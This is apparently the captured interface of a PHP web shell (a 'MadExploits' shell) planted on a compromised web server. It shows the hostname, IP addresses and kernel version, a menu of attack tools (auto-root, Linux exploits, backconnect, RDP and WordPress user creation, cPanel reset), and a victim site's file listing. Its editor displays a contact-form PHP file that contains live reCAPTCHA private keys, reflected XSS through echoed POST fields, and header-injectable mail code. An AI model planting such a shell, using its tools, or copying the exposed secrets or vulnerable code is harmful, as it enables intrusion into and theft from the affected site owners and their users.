Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
thearyasamaj /
public_html /
images /
acmesolar /
[ HOME SHELL ]
Name
Size
Permission
Action
acmeadmin
[ DIR ]
drwxr-xr-x
400.shtml
130
B
-rw-r--r--
401.shtml
162
B
-rw-r--r--
403.shtml
201
B
-rw-r--r--
404.shtml
83
B
-rw-r--r--
500.php
461
B
-rw-r--r--
500.shtml
71
B
-rw-r--r--
acme-aboutus.php
1.38
KB
-rw-r--r--
acme-contactus.php
10.2
KB
-rw-r--r--
acme-events.php
1.38
KB
-rw-r--r--
acme-footer.php
128
B
-rw-r--r--
acme-header.php
813
B
-rw-r--r--
acme-header_5_oct_12.php
786
B
-rw-r--r--
acme-home.php
5.45
KB
-rw-r--r--
acme-home_5_oct_12.php
3.1
KB
-rw-r--r--
acme-leftpart.php
1.61
KB
-rw-r--r--
acme-manufacturingfacality.php
1.4
KB
-rw-r--r--
acme-productdetail.php
4.93
KB
-rw-r--r--
acme-productdetail_5_oct_12.ph...
4.93
KB
-rw-r--r--
acme-sitemap.php
1.38
KB
-rw-r--r--
client_connection.php
453
B
-rw-r--r--
default.html
0
B
-rw-r--r--
error_log
142.92
KB
-rw-r--r--
favicon.ico
43
B
-rw-r--r--
home.css
5.64
KB
-rw-r--r--
home_5_oct_12.css
3.38
KB
-rw-r--r--
index.php
44
B
-rw-r--r--
recaptchalib.php
9.53
KB
-rw-r--r--
subpage-9-oct.css
1.26
KB
-rw-r--r--
subpage.css
1.59
KB
-rw-r--r--
subpage_5_oct_12.css
1.19
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : acme-contactus.php
<?php include ("common/client_connection.php"); require_once('recaptchalib.php'); $host = $_SERVER['HTTP_HOST']; if($host == "www.acmesolar.pb") { // For Local Site $publickey = "6LdRu94SAAAAAGaZWrKaD3qUIPpHalxYGgUtJXz1"; $privatekey = "6LdRu94SAAAAANgbp_DDQ3mkNPqQ_mlMLvGpLV0V"; } else { // For Live Site $publickey = "6LdSu94SAAAAAH299YbEU6csF5w6tevWUJKcrCXP"; $privatekey = "6LdSu94SAAAAANgqilb5Hkp6Y4II2mXduj7ocpVI"; } # the response from reCAPTCHA $resp = null; # the error code from reCAPTCHA, if any $error = null; if(isset($_POST['btnsend'])) { if ($_POST["recaptcha_response_field"]) { $resp = recaptcha_check_answer ($privatekey,$_SERVER["REMOTE_ADDR"],$_POST["recaptcha_challenge_field"],$_POST["recaptcha_response_field"]); if ($resp->is_valid) { $postFirstName = addslashes($_POST["txtfirstname"]); $postLastName = addslashes($_POST["txtlastname"]); $postEmail = $_POST["txtemail"]; $postPhone = $_POST["txtphone"]; $postMsg = addslashes($_POST["txtarea"]); //$to1 = "gwwprogrammer@gmail.com"; $to1 = "acme_foods@yahoo.com"; $subject = "Comments received at Acme Solar website"; $postMsg = "Acme Solar"; $message .= "<BR>First Name: " .$postFirstName; $message .= "<BR>Last Name: " .$postLastName; $message .= "<BR>Email: ".$postEmail; $message .= "<BR>Phone: " .$postPhone; $message .= "<BR>Message: ".$postMsg; $headers = 'MIME-Version: 1.0' . "\r\n"; $headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n"; //$headers .= 'To: '.$to.'' . "\r\n"; $headers .= 'From '.$postMsg.' '.$postEmail.''; if(mail($to1, $subject, $message, $headers)) { $to = $postEmail; $postMsg1 = "Acme Solar"; $subject = "Comments submitted at acme solar website"; $message1 .= "Thank you for visiting the acmesolardehydration.com website. Your comments/suggestions will help us realize the acme solar vision.<BR>"; $message1 .= "<BR>First Name: " .$postFirstName; $message1 .= "<BR>Last Name: " .$postLastName; $message1 .= "<BR>Email: ".$postEmail; $message1 .= "<BR>Phone: ".$postPhone; $message1 .= "<BR>Message: ".$postMsg; $headers = 'MIME-Version: 1.0' . "\r\n"; $headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n"; //$headers .= 'To: '.$to.'' . "\r\n"; //$headers .= 'From: '.$postMsg1.' ,'.$to1.''; $headers .= 'From '.$postMsg1.' '.$to1.''; if(mail($to, $subject, $message1, $headers)) { $msg = "Message sent successfully."; } } } //////////////// if ($resp->is_valid) OVER. else { # set the error code so that we can display it //echo $error = $resp->error; $msg = "Invalid Recaptcha"; } } ////////////// if ($_POST["recaptcha_response_field"]) OVER } ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title><?php echo $title_AcmeSolarFood; ?>-<?php echo $title_ContactUs; ?></title> <link href="home.css" rel="stylesheet" type="text/css" /> <link href="subpage.css" rel="stylesheet" type="text/css" /> <script language="javascript" src="js/common.js"></script> <script language="javascript"> var RecaptchaOptions = { theme : "white", tabindex : 2 }; </script> <script language="javascript" type="text/javascript"> function check_scriptTag(string) // for address field. { var Comments; Comments=string; Comments=Comments.toLowerCase(); var matchPos = Comments.search('<'); var matchPos1 = Comments.search('<'); var matchPos2 = Comments.search('>'); var matchPos3 = Comments.search('>'); if(matchPos != -1 || matchPos1 != -1 || matchPos2 != -1 || matchPos3 != -1) { return false; } } function validationcheck() { if(document.frmcontactus.txtfirstname.value == "") { alert("Please enter firstname."); document.frmcontactus.txtfirstname.focus(); return false; } else if(check_scriptTag(document.frmcontactus.txtfirstname.value)==false) { alert("Please enter correct firstname."); document.frmcontactus.txtfirstname.focus(); return false; } if(document.frmcontactus.txtlastname.value == "") { alert("Please enter lastname."); document.frmcontactus.txtlastname.focus(); return false; } else if(check_scriptTag(document.frmcontactus.txtlastname.value)==false) { alert("Please enter correct lastname."); document.frmcontactus.txtlastname.focus(); return false; } if(document.frmcontactus.txtemail.value == "") { alert("Please enter email address"); document.frmcontactus.txtemail.focus(); return false; } if(document.frmcontactus.txtemail.value !="") { var str=document.frmcontactus.txtemail.value var filter=/^([\w-]+(?:\.[\w-]+)*)@((?:[\w-]+\.)*\w[\w-]{0,66})\.([a-z]{2,6}(?:\.[a-z]{2})?)$/i if (filter.test(str)) { } else { alert("Please input a valid email address!"); document.frmcontactus.txtemail.focus(); return false; } } if(document.frmcontactus.txtphone.value == "") { alert("Please enter phone."); document.frmcontactus.txtphone.focus(); return false; } else if(check_scriptTag(document.frmcontactus.txtphone.value)==false) { alert("Please enter correct phone."); document.frmcontactus.txtphone.focus(); return false; } if(check_scriptTag(document.frmcontactus.txtarea.value)==false) { alert("Please enter correct message."); document.frmcontactus.txtarea.focus(); return false; } if(document.frmcontactus.recaptcha_response_field.value == "") { alert("Please enter recaptcha field."); document.frmcontactus.recaptcha_response_field.focus(); return false; } } </script> </head> <body> <div class="maindiv"> <div class="container"> <div class="header"> <?php include "acme-header.php"; ?> </div> <div class="photo"> <?php $getImgBanner = getFieldValue('banner_file','staticpages','pageId=3'); ?> <img src="images/<?php echo $getImgBanner; ?>" alt="<?php echo $getImgBanner; ?>" /> </div> <div class="maincontsub"> <div class="leftlinks"> <?php include "acme-leftpart.php"; ?> </div> <div class="mainproduct"> <?php echo "<h1>".stripslashes(getFieldValue('PageName','staticpages','pageId=3'))."</h1>"; ?> <iframe width="650" height="400" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" src="http://maps.google.co.in/maps?f=q&source=s_q&hl=en&geocode=&q=502,+Parth+Tower,Ahmedabad,+Gujarat&aq=&sll=23.039568,72.566004&sspn=0.426515,0.727158&g=Ahmedabad,+Gujarat&ie=UTF8&hq=502,+Parth+Tower,Ahmedabad,+Gujarat&t=m&z=14&iwloc=A&cid=14037325205937560071&ll=23.062779,72.566618&output=embed"></iframe><br /> <br /> <?php echo stripslashes(getFieldValue('PageContent','staticpages','pageId=3')); ?> <div class="clr"></div> <div class="form_div"> <form action="acme-contactus.php" method="post" name="frmcontactus" id="frmcontactus" onsubmit="return validationcheck();"> <table width="649" border="0" cellspacing="0" cellpadding="0"> <tr> <td></td><td align="left"><font color="#FF0000"><?php echo $msg; ?></font></td> </tr> <tr> <td align="left" valign="top">First Name:</td> <td align="left" valign="top"><input name="txtfirstname" type="text" class="contacttextarea" size="50" value="<?php echo $_POST["txtfirstname"]; ?>" /></td> </tr> <tr> <td height="8" colspan="2" align="left" valign="top"></td> </tr> <tr> <td width="81" align="left" valign="top">Last Name:</td> <td width="568" align="left" valign="top"><input name="txtlastname" type="text" class="contacttextarea" size="50" value="<?php echo $_POST["txtlastname"]; ?>" /></td> </tr> <tr> <td height="8" colspan="2" align="left" valign="top"></td> </tr> <tr> <td align="left" valign="top">Email:</td> <td align="left" valign="top"><input name="txtemail" type="text" class="contacttextarea" size="50" value="<?php echo $_POST["txtemail"]; ?>" /></td> </tr> <tr> <td height="8" colspan="2" align="left" valign="top"></td> </tr> <tr> <td align="left" valign="top">Phone:</td> <td align="left" valign="top"><input name="txtphone" type="text" class="contacttextarea" size="50" value="<?php echo $_POST["txtphone"]; ?>" /></td> </tr> <tr> <td height="8" colspan="2" align="left" valign="top"></td> </tr> <tr> <td align="left" valign="top">Message:</td> <td align="left" valign="top"><textarea name="txtarea" cols="47" class="contacttextarea" rows="5"><?php echo $_POST["txtarea"]; ?></textarea> </td> </tr> <tr> <td height="8" colspan="2" align="left" valign="top"></td> </tr> <tr> <td align="left" valign="top">Verification Code:</td> <td align="left" valign="top"><?php echo recaptcha_get_html($publickey, $error);?></td> </tr> <tr> <td height="8" colspan="2" align="left" valign="top"></td> </tr> <tr> <td align="left" valign="top"> </td> <td align="left" valign="top"><input type="submit" name="btnsend" value="Send" class="send" /> <input type="reset" name="reset" value="Reset" class="reset" /></td> </tr> </table> </form> </div> </div> <div class="clr"></div> <?php include "acme-footer.php"; ?> </div> </div> </div> </body> </html>
Close